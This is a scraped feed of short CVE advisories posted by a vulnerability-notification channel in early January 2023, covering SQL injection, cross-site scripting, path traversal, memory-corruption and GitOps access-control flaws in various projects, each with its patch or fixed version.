🚨 CVE-2022-23509Weave GitOps is a simple open source developer platform for people who want cloud native applications, without needing Kubernetes expertise. GitOps run has a local S3 bucket which it uses for synchronizing files that are later applied against a Kubernetes cluster. The communication between GitOps Run and the local S3 bucket is not encrypted. This allows privileged users or process to tap the local traffic to gain information permitting access to the s3 bucket. From that point, it would be possible to alter the bucket content, resulting in changes in the Kubernetes cluster's resources. There are no known workaround(s) for this vulnerability. This vulnerability has been fixed by commits ce2bbff and babd915. Users should upgrade to Weave GitOps version >= v0.12.0 released on 08/12/2022.🎖@cveNotify |
|
| 2023-01-09 16:29:47 |
🚨 CVE-2023-22472Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link on a Windows computer. (e.g. in an email, chat link, etc). There are currently no known workarounds. It is recommended that the Nextcloud Desktop client is upgraded to 3.6.2.🎖@cveNotify |
|
| 2023-01-09 16:29:46 |
🚨 CVE-2022-23508Weave GitOps is a simple open source developer platform for people who want cloud native applications, without needing Kubernetes expertise. A vulnerability in GitOps run could allow a local user or process to alter a Kubernetes cluster's resources. GitOps run has a local S3 bucket which it uses for synchronizing files that are later applied against a Kubernetes cluster. Its endpoint had no security controls to block unauthorized access, therefore allowing local users (and processes) on the same machine to see and alter the bucket content. By leveraging this vulnerability, an attacker could pick a workload of their choosing and inject it into the S3 bucket, which resulted in the successful deployment in the target cluster, without the need to provide any credentials to either the S3 bucket nor the target Kubernetes cluster. There are no known workarounds for this issue, please upgrade. This vulnerability has been fixed by commits 75268c4 and 966823b. Users should upgrade to Weave GitOps version >= v0.12.0 released on 08/12/2022. ### Workarounds There is no workaround for this vulnerability. ### References Disclosed by Paulo Gomes, Senior Software Engineer, Weaveworks. ### For more information If you have any questions or comments about this advisory: - Open an issue in [Weave GitOps repository](https://github.com/weaveworks/weave-gitops) - Email us at [support@weave.works](mailto:support@weave.works)🎖@cveNotify |
|
| 2023-01-09 14:29:57 |
🚨 CVE-2022-4882A vulnerability was found in kaltura mwEmbed up to 2.91. It has been rated as problematic. Affected by this issue is some unknown functionality of the file modules/KalturaSupport/components/share/share.js of the component Share Plugin. The manipulation of the argument res leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.92.rc1 is able to address this issue. The name of the patch is 4f11b6f6610acd6d89de5f8be47cf7c610643845. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217664.🎖@cveNotify |
|
| 2023-01-09 14:29:56 |
🚨 CVE-2017-20165A vulnerability classified as problematic has been found in debug-js debug up to 3.0.x. This affects the function useColors of the file src/node.js. The manipulation of the argument str leads to inefficient regular expression complexity. Upgrading to version 3.1.0 is able to address this issue. The name of the patch is c38a0166c266a679c8de012d4eaccec3f944e685. It is recommended to upgrade the affected component. The identifier VDB-217665 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-09 14:29:55 |
🚨 CVE-2022-22470IBM Security Verify Governance 10.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 225232.🎖@cveNotify |
|
| 2023-01-09 14:29:54 |
🚨 CVE-2022-22088Memory corruption in Bluetooth HOST due to buffer overflow while parsing the command response received from remote🎖@cveNotify |
|
| 2023-01-09 14:29:52 |
🚨 CVE-2022-33219Memory corruption in Automotive due to integer overflow to buffer overflow while registering a new listener with shared buffer.🎖@cveNotify |
|
| 2023-01-09 14:29:51 |
🚨 CVE-2022-22079Denial of service while processing fastboot flash command on mmc due to buffer over read🎖@cveNotify |
|
| 2023-01-09 14:29:50 |
🚨 CVE-2022-25717Memory corruption in display due to double free while allocating frame buffer memory🎖@cveNotify |
|
| 2023-01-09 14:29:49 |
🚨 CVE-2022-33253Transient DOS due to buffer over-read in WLAN while parsing corrupted NAN frames.🎖@cveNotify |
|
| 2023-01-09 14:29:48 |
🚨 CVE-2022-25721Memory corruption in video driver due to type confusion error during video playback🎖@cveNotify |
|
| 2023-01-09 14:29:46 |
🚨 CVE-2022-25725Denial of service in MODEM due to improper pointer handling🎖@cveNotify |
|
| 2023-01-09 14:29:45 |
🚨 CVE-2022-33265Memory corruption due to information exposure in Powerline Communication Firmware while sending different MMEs from a single, unassociated device.🎖@cveNotify |
|
| 2023-01-09 14:29:44 |
🚨 CVE-2022-33218Memory corruption in Automotive due to improper input validation.🎖@cveNotify |
|
| 2023-01-09 14:29:43 |
🚨 CVE-2022-33252Information disclosure due to buffer over-read in WLAN while handling IBSS beacons frame.🎖@cveNotify |
|
| 2023-01-09 14:29:42 |
🚨 CVE-2022-33266Memory corruption in Audio due to integer overflow to buffer overflow while music playback of clips like amr,evrc,qcelp with modified content.🎖@cveNotify |
|
| 2023-01-09 14:29:41 |
🚨 CVE-2022-33255Information disclosure due to buffer over-read in Bluetooth HOST while processing GetFolderItems and GetItemAttribute Cmds from peer device.🎖@cveNotify |
|
| 2023-01-09 14:29:40 |
🚨 CVE-2022-33274Memory corruption in android core due to improper validation of array index while returning feature ids after license authentication.🎖@cveNotify |
|
| 2023-01-09 14:29:39 |
🚨 CVE-2022-33276Memory corruption due to buffer copy without checking size of input in modem while receiving WMI_REQUEST_STATS_CMDID command.🎖@cveNotify |
|
| 2023-01-09 14:29:38 |
🚨 CVE-2022-33283Information disclosure due to buffer over-read in WLAN while WLAN frame parsing due to missing frame length check.🎖@cveNotify |
|
| 2023-01-09 14:29:37 |
🚨 CVE-2022-33284Information disclosure due to buffer over-read in WLAN while parsing BTM action frame.🎖@cveNotify |
|
| 2023-01-09 14:29:36 |
🚨 CVE-2022-33286Transient DOS due to buffer over-read in WLAN while processing 802.11 management frames.🎖@cveNotify |
|
| 2023-01-09 06:29:37 |
🚨 CVE-2022-45126Kernel subsystem within OpenHarmony-v3.1.4 and prior versions in kernel_liteos_a has a kernel stack overflow vulnerability when call SysClockGettime. 4 bytes padding data from kernel stack are copied to user space incorrectly and leaked.🎖@cveNotify |
|
| 2023-01-09 06:29:36 |
🚨 CVE-2023-0036platform_callback_stub in misc subsystem within OpenHarmony-v3.0.5 and prior versions has an authentication bypass vulnerability which allows an "SA relay attack".Local attackers can bypass authentication and attack other SAs with high privilege.🎖@cveNotify |
|
| 2023-01-09 06:29:35 |
🚨 CVE-2022-43662Kernel subsystem within OpenHarmony-v3.1.4 and prior versions in kernel_liteos_a has a kernel stack overflow vulnerability when call SysTimerGettime. 4 bytes padding data from kernel stack are copied to user space incorrectly and leaked.🎖@cveNotify |
|
| 2023-01-08 22:29:37 |
🚨 CVE-2015-10031A vulnerability classified as critical was found in purpleparrots 491-Project. This vulnerability affects unknown code of the file update.php of the component Highscore Handler. The manipulation leads to sql injection. The name of the patch is a812a5e4cf72f2a635a716086fe1ee2b8fa0b1ab. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217648.🎖@cveNotify |
|
| 2023-01-08 22:29:36 |
🚨 CVE-2021-4309A vulnerability, which was classified as problematic, has been found in 01-Scripts 01ACP. This issue affects some unknown processing. The manipulation of the argument $_SERVER['SCRIPT_NAME'] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is a16eb7da46ed22bc61067c212635394f2571d3c4. It is recommended to apply a patch to fix this issue. The identifier VDB-217649 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 19:29:37 |
🚨 CVE-2016-15015A vulnerability, which was classified as problematic, was found in viafintech Barzahlen Payment Module PHP SDK up to 2.0.0. Affected is the function verify of the file src/Webhook.php. The manipulation leads to observable timing discrepancy. Upgrading to version 2.0.1 is able to address this issue. The name of the patch is 3e7d29dc0ca6c054a6d6e211f32dae89078594c1. It is recommended to upgrade the affected component. VDB-217650 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 19:29:36 |
🚨 CVE-2015-10031A vulnerability classified as critical was found in purpleparrots 491-Project. This vulnerability affects unknown code of the file update.php of the component Highscore Handler. The manipulation leads to sql injection. The name of the patch is a812a5e4cf72f2a635a716086fe1ee2b8fa0b1ab. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217648.🎖@cveNotify |
|
| 2023-01-08 19:29:35 |
🚨 CVE-2021-4309A vulnerability, which was classified as problematic, has been found in 01-Scripts 01ACP. This issue affects some unknown processing. The manipulation of the argument $_SERVER['SCRIPT_NAME'] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is a16eb7da46ed22bc61067c212635394f2571d3c4. It is recommended to apply a patch to fix this issue. The identifier VDB-217649 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 17:29:35 |
🚨 CVE-2022-0668JFrog Artifactory prior to 7.37.13 is vulnerable to Authentication Bypass, which can lead to Privilege Escalation when a specially crafted request is sent by an unauthenticated user.🎖@cveNotify |
|
| 2023-01-08 16:29:36 |
🚨 CVE-2022-4881A vulnerability was found in CapsAdmin PAC3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lua/pac3/core/shared/http.lua. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. The name of the patch is 8fc9e12dfa21d757be6eb4194c763e848b299ac0. It is recommended to apply a patch to fix this issue. VDB-217646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 14:29:46 |
🚨 CVE-2014-125069A vulnerability was found in saxman maps-js-icoads. It has been classified as problematic. Affected is an unknown function. The manipulation leads to exposure of information through directory listing. It is possible to launch the attack remotely. The name of the patch is 34b8b0cce2807b119f4cffda2ac48fc8f427d69a. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217644.🎖@cveNotify |
|
| 2023-01-08 14:29:45 |
🚨 CVE-2019-25100A vulnerability was found in happyman twmap. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file twmap3/data/ajaxCRUD/pointdata2.php. The manipulation of the argument id leads to sql injection. Upgrading to version v2.9_v4.31 is able to address this issue. The name of the patch is babbec79b3fa4efb3bd581ea68af0528d11bba0c. It is recommended to upgrade the affected component. The identifier VDB-217645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 12:29:47 |
🚨 CVE-2007-10002A vulnerability, which was classified as critical, has been found in web-cyradm. Affected by this issue is some unknown functionality of the file auth.inc.php. The manipulation of the argument login/login_password/LANG leads to sql injection. The attack may be launched remotely. The name of the patch is 2bcbead3bdb5f118bf2c38c541eaa73c29dcc90f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217640.🎖@cveNotify |
|
| 2023-01-08 12:29:45 |
🚨 CVE-2014-125067A vulnerability classified as critical was found in corincerami curiosity. Affected by this vulnerability is an unknown functionality of the file app/controllers/image_controller.rb. The manipulation of the argument sol leads to sql injection. The name of the patch is d64fddd74ca72714e73f4efe24259ca05c8190eb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217639.🎖@cveNotify |
|
| 2023-01-08 12:29:43 |
🚨 CVE-2015-10030A vulnerability has been found in SUKOHI Surpass and classified as critical. This vulnerability affects unknown code of the file src/Sukohi/Surpass/Surpass.php. The manipulation of the argument dir leads to pathname traversal. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is d22337d453a2a14194cdb02bf12cdf9d9f827aa7. It is recommended to upgrade the affected component. VDB-217642 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 12:29:41 |
🚨 CVE-2020-36647A vulnerability classified as critical has been found in YunoHost-Apps transmission_ynh. Affected is an unknown function of the file conf/nginx.conf. The manipulation leads to path traversal. The name of the patch is f136dfd44eda128129e5fd2d850a3a3c600e6a4a. It is recommended to apply a patch to fix this issue. VDB-217638 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 12:29:40 |
🚨 CVE-2020-36648A vulnerability, which was classified as critical, was found in pouetnet pouet 2.0. This affects an unknown part. The manipulation of the argument howmany leads to sql injection. The name of the patch is 11d615931352066fb2f6dcb07428277c2cd99baf. It is recommended to apply a patch to fix this issue. The identifier VDB-217641 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 12:29:39 |
🚨 CVE-2021-4308A vulnerability was found in WebPA up to 3.1.1. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version 3.1.2 is able to address this issue. The name of the patch is 8836c4f549181e885a68e0e7ca561fdbcbd04bf0. It is recommended to upgrade the affected component. The identifier VDB-217637 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 12:29:37 |
🚨 CVE-2014-125066A vulnerability was found in emmflo yuko-bot. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument title leads to denial of service. The attack can be initiated remotely. The name of the patch is e580584b877934a4298d4dd0c497c79e579380d0. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217636.🎖@cveNotify |
|
| 2023-01-08 00:29:47 |
🚨 CVE-2021-4301A vulnerability was found in slackero phpwcms up to 1.9.26 and classified as critical. Affected by this issue is some unknown functionality. The manipulation of the argument $phpwcms['db_prepend'] leads to sql injection. The attack may be launched remotely. Upgrading to version 1.9.27 is able to address this issue. The name of the patch is 77dafb6a8cc1015f0777daeb5792f43beef77a9d. It is recommended to upgrade the affected component. VDB-217418 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 00:29:46 |
🚨 CVE-2022-1102A vulnerability classified as problematic has been found in SourceCodester Royale Event Management System 1.0. Affected is an unknown function of the file /royal_event/companyprofile.php. The manipulation of the argument companyname/regno/companyaddress/companyemail leads to cross site scripting. It is possible to launch the attack remotely. VDB-195786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-08 00:29:45 |
🚨 CVE-2022-2666A vulnerability has been found in SourceCodester Loan Management System and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205618 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:48 |
🚨 CVE-2013-10009A vulnerability was found in DrAzraelTod pyChao and classified as critical. Affected by this issue is the function klauen/lesen of the file mod_fun/__init__.py. The manipulation leads to sql injection. The name of the patch is 9d8adbc07c384ba51c2583ce0819c9abb77dc648. It is recommended to apply a patch to fix this issue. VDB-217634 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:47 |
🚨 CVE-2014-125064A vulnerability, which was classified as critical, has been found in elgs gosqljson. This issue affects the function QueryDbToArray/QueryDbToMap/ExecDb of the file gosqljson.go. The manipulation of the argument sqlStatement leads to sql injection. The name of the patch is 2740b331546cb88eb61771df4c07d389e9f0363a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217631.🎖@cveNotify |
|
| 2023-01-07 22:29:46 |
🚨 CVE-2015-10029A vulnerability classified as problematic was found in kelvinmo simplexrd up to 3.1.0. This vulnerability affects unknown code of the file simplexrd/simplexrd.class.php. The manipulation leads to xml external entity reference. Upgrading to version 3.1.1 is able to address this issue. The name of the patch is 4c9f2e028523ed705b555eca2c18c64e71f1a35d. It is recommended to upgrade the affected component. VDB-217630 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:45 |
🚨 CVE-2016-15013A vulnerability was found in ForumHulp searchresults. It has been rated as critical. Affected by this issue is the function list_keywords of the file event/listener.php. The manipulation of the argument word leads to sql injection. The name of the patch is dd8a312bb285ad9735a8e1da58e9e955837b7322. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217628.🎖@cveNotify |
|
| 2023-01-07 22:29:44 |
🚨 CVE-2016-15014A vulnerability has been found in CESNET theme-cesnet up to 1.x and classified as problematic. Affected by this vulnerability is an unknown functionality of the file cesnet/core/lostpassword/templates/resetpassword.php. The manipulation leads to insufficiently protected credentials. Attacking locally is a requirement. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 2b857f2233ce5083b4d5bc9bfc4152f933c3e4a6. It is recommended to upgrade the affected component. The identifier VDB-217633 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:43 |
🚨 CVE-2017-20164A vulnerability was found in Symbiote Seed up to 6.0.2. It has been classified as critical. Affected is the function onBeforeSecurityLogin of the file code/extensions/SecurityLoginExtension.php of the component Login. The manipulation of the argument URL leads to open redirect. It is possible to launch the attack remotely. Upgrading to version 6.0.3 is able to address this issue. The name of the patch is b065ebd82da53009d273aa7e989191f701485244. It is recommended to upgrade the affected component. VDB-217626 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:42 |
🚨 CVE-2020-36646A vulnerability classified as problematic has been found in MediaArea ZenLib up to 0.4.38. This affects the function Ztring::Date_From_Seconds_1970_Local of the file Source/ZenLib/Ztring.cpp. The manipulation of the argument Value leads to unchecked return value to null pointer dereference. Upgrading to version 0.4.39 is able to address this issue. The name of the patch is 6475fcccd37c9cf17e0cfe263b5fe0e2e47a8408. It is recommended to upgrade the affected component. The identifier VDB-217629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:41 |
🚨 CVE-2021-4307A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading to version 2.6.1 is able to address this issue. The name of the patch is c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.🎖@cveNotify |
|
| 2023-01-07 22:29:40 |
🚨 CVE-2014-125065A vulnerability, which was classified as critical, was found in john5223 bottle-auth. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is 99cfbcc0c1429096e3479744223ffb4fda276875. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217632.🎖@cveNotify |
|
| 2023-01-07 22:29:39 |
🚨 CVE-2020-36645A vulnerability, which was classified as critical, was found in square squalor. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version v0.0.0 is able to address this issue. The name of the patch is f6f0a47cc344711042eb0970cb423e6950ba3f93. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217623.🎖@cveNotify |
|
| 2023-01-07 22:29:38 |
🚨 CVE-2014-125063A vulnerability was found in ada-l0velace Bid and classified as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is abd71140b8219fa8741d0d8a57ab27d5bfd34222. It is recommended to apply a patch to fix this issue. The identifier VDB-217625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 22:29:36 |
🚨 CVE-2015-10028A vulnerability has been found in ss15-this-is-sparta and classified as problematic. This vulnerability affects unknown code of the file js/roomElement.js of the component Main Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is ba2f71ad3a46e5949ee0c510b544fa4ea973baaa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217624.🎖@cveNotify |
|
| 2023-01-07 19:29:36 |
🚨 CVE-2015-10027A vulnerability, which was classified as problematic, has been found in hydrian TTRSS-Auth-LDAP. Affected by this issue is some unknown functionality of the component Username Handler. The manipulation leads to ldap injection. Upgrading to version 2.0b1 is able to address this issue. The name of the patch is a7f7a5a82d9202a5c40d606a5c519ba61b224eb8. It is recommended to upgrade the affected component. VDB-217622 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 19:29:35 |
🚨 CVE-2021-4306A vulnerability classified as problematic has been found in cronvel terminal-kit up to 2.1.7. Affected is an unknown function. The manipulation leads to inefficient regular expression complexity. Upgrading to version 2.1.8 is able to address this issue. The name of the patch is a2e446cc3927b559d0281683feb9b821e83b758c. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217620.🎖@cveNotify |
|
| 2023-01-07 16:29:46 |
🚨 CVE-2014-125059A vulnerability, which was classified as problematic, has been found in sternenseemann sternenblog. This issue affects the function blog_index of the file main.c. The manipulation of the argument post_path leads to file inclusion. The attack may be initiated remotely. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is cf715d911d8ce17969a7926dea651e930c27e71a. It is recommended to upgrade the affected component. The identifier VDB-217613 was assigned to this vulnerability. NOTE: This case is rather theoretical and probably won't happen. Maybe only on obscure Web servers.🎖@cveNotify |
|
| 2023-01-07 16:29:44 |
🚨 CVE-2014-125060A vulnerability, which was classified as critical, was found in holdennb CollabCal. Affected is the function handleGet of the file calenderServer.cpp. The manipulation leads to improper authentication. It is possible to launch the attack remotely. The name of the patch is b80f6d1893607c99e5113967592417d0fe310ce6. It is recommended to apply a patch to fix this issue. VDB-217614 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 16:29:43 |
🚨 CVE-2014-125061** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in peel filebroker and classified as critical. Affected by this issue is the function select_transfer_status_desc of the file lib/common.rb. The manipulation leads to sql injection. The name of the patch is 91097e26a6c84d3208a351afaa52e0f62e5853ef. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217616. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-07 16:29:42 |
🚨 CVE-2015-10024A vulnerability classified as critical was found in hoffie larasync. This vulnerability affects unknown code of the file repository/content/file_storage.go. The manipulation leads to path traversal. The name of the patch is 776bad422f4bd4930d09491711246bbeb1be9ba5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217612.🎖@cveNotify |
|
| 2023-01-07 16:29:41 |
🚨 CVE-2015-10025A vulnerability has been found in luelista miniConf up to 1.7.6 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file miniConf/MessageView.cs of the component URL Scanning. The manipulation leads to denial of service. Upgrading to version 1.7.7 and 1.8.0 is able to address this issue. The name of the patch is c06c2e5116c306e4e1bc79779f0eda2d1182f655. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217615.🎖@cveNotify |
|
| 2023-01-07 16:29:39 |
🚨 CVE-2015-10026A vulnerability was found in tiredtyrant flairbot. It has been declared as critical. This vulnerability affects unknown code of the file flair.py. The manipulation leads to sql injection. The name of the patch is 5e112b68c6faad1d4699d02c1ebbb7daf48ef8fb. It is recommended to apply a patch to fix this issue. VDB-217618 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 16:29:38 |
🚨 CVE-2016-15012** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in forcedotcom SalesforceMobileSDK-Windows up to 4.x. It has been rated as critical. This issue affects the function ComputeCountSql of the file SalesforceSDK/SmartStore/Store/QuerySpec.cs. The manipulation leads to sql injection. Upgrading to version 5.0.0 is able to address this issue. The name of the patch is 83b3e91e0c1e84873a6d3ca3c5887eb5b4f5a3d8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217619. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-07 16:29:36 |
🚨 CVE-2022-4880A vulnerability was found in stakira OpenUtau. It has been classified as critical. This affects the function VoicebankInstaller of the file OpenUtau.Core/Classic/VoicebankInstaller.cs of the component ZIP Archive Handler. The manipulation leads to path traversal. Upgrading to version 0.0.991 is able to address this issue. The name of the patch is 849a0a6912aac8b1c28cc32aa1132a3140caff4a. It is recommended to upgrade the affected component. The identifier VDB-217617 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 14:29:42 |
🚨 CVE-2015-10021A vulnerability was found in ritterim definely. It has been classified as problematic. Affected is an unknown function of the file src/database.js. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is b31a022ba4d8d17148445a13ebb5a42ad593dbaa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217608.🎖@cveNotify |
|
| 2023-01-07 14:29:38 |
🚨 CVE-2015-10023A vulnerability classified as critical has been found in Fumon trello-octometric. This affects the function main of the file metrics-ui/server/srv.go. The manipulation of the argument num leads to sql injection. The name of the patch is a1f1754933fbf21e2221fbc671c81a47de6a04ef. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217611.🎖@cveNotify |
|
| 2023-01-07 14:29:37 |
🚨 CVE-2014-125058A vulnerability was found in LearnMeSomeCodes project3 and classified as critical. This issue affects the function search_first_name of the file search.rb. The manipulation leads to sql injection. The name of the patch is d3efa17ae9f6b2fc25a6bbcf165cefed17c7035e. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217607. NOTE: Maintainer is aware of this issue as remarked in the source code.🎖@cveNotify |
|
| 2023-01-07 14:29:36 |
🚨 CVE-2018-25070A vulnerability has been found in polterguy Phosphorus Five up to 8.2 and classified as critical. This vulnerability affects the function csv.Read of the file plugins/extras/p5.mysql/NonQuery.cs of the component CSV Import. The manipulation leads to sql injection. Upgrading to version 8.3 is able to address this issue. The name of the patch is c179a3d0703db55cfe0cb939b89593f2e7a87246. It is recommended to upgrade the affected component. VDB-217606 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 12:29:48 |
🚨 CVE-2014-125056A vulnerability was found in Pylons horus and classified as problematic. Affected by this issue is some unknown functionality of the file horus/flows/local/services.py. The manipulation leads to observable timing discrepancy. The name of the patch is fd56ccb62ce3cbdab0484fe4f9c25c4eda6c57ec. It is recommended to apply a patch to fix this issue. VDB-217598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 12:29:47 |
🚨 CVE-2014-125057A vulnerability was found in mrobit robitailletheknot. It has been classified as problematic. This affects an unknown part of the file app/filters.php of the component CSRF Token Handler. The manipulation of the argument _token leads to incorrect comparison. It is possible to initiate the attack remotely. The name of the patch is 6b2813696ccb88d0576dfb305122ee880eb36197. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217599.🎖@cveNotify |
|
| 2023-01-07 12:29:46 |
🚨 CVE-2020-36644A vulnerability has been found in jamesmartin Inline SVG up to 1.7.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file lib/inline_svg/action_view/helpers.rb of the component URL Parameter Handler. The manipulation of the argument filename leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.7.2 is able to address this issue. The name of the patch is f5363b351508486021f99e083c92068cf2943621. It is recommended to upgrade the affected component. The identifier VDB-217597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 12:29:45 |
🚨 CVE-2014-125054A vulnerability classified as critical was found in koroket RedditOnRails. This vulnerability affects unknown code of the component Vote Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The name of the patch is 7f3c7407d95d532fcc342b00d68d0ea09ca71030. It is recommended to apply a patch to fix this issue. VDB-217594 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 12:29:41 |
🚨 CVE-2014-125055A vulnerability, which was classified as problematic, was found in agnivade easy-scrypt. Affected is the function VerifyPassphrase of the file scrypt.go. The manipulation leads to observable timing discrepancy. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is 477c10cf3b144ddf96526aa09f5fdea613f21812. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217596.🎖@cveNotify |
|
| 2023-01-07 12:29:40 |
🚨 CVE-2015-10019A vulnerability, which was classified as problematic, has been found in foxoverflow MySimplifiedSQL. This issue affects some unknown processing of the file MySimplifiedSQL_Examples.php. The manipulation of the argument FirstName/LastName leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 3b7481c72786f88041b7c2d83bb4f219f77f1293. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217595.🎖@cveNotify |
|
| 2023-01-07 12:29:39 |
🚨 CVE-2023-0113A vulnerability was found in Netis Netcore Router. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-217591.🎖@cveNotify |
|
| 2023-01-07 12:29:38 |
🚨 CVE-2023-0114A vulnerability was found in Netis Netcore Router. It has been rated as problematic. Affected by this issue is some unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to cleartext storage in a file or on disk. Local access is required to approach this attack. The identifier of this vulnerability is VDB-217592.🎖@cveNotify |
|
| 2023-01-07 06:29:44 |
🚨 CVE-2023-0106Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.🎖@cveNotify |
|
| 2023-01-07 06:29:43 |
🚨 CVE-2023-0107Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.🎖@cveNotify |
|
| 2023-01-07 06:29:42 |
🚨 CVE-2023-0108Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.🎖@cveNotify |
|
| 2023-01-07 06:29:38 |
🚨 CVE-2023-0111Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.🎖@cveNotify |
|
| 2023-01-07 06:29:37 |
🚨 CVE-2022-24439All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.🎖@cveNotify |
|
| 2023-01-07 06:29:36 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2023-01-07 02:29:39 |
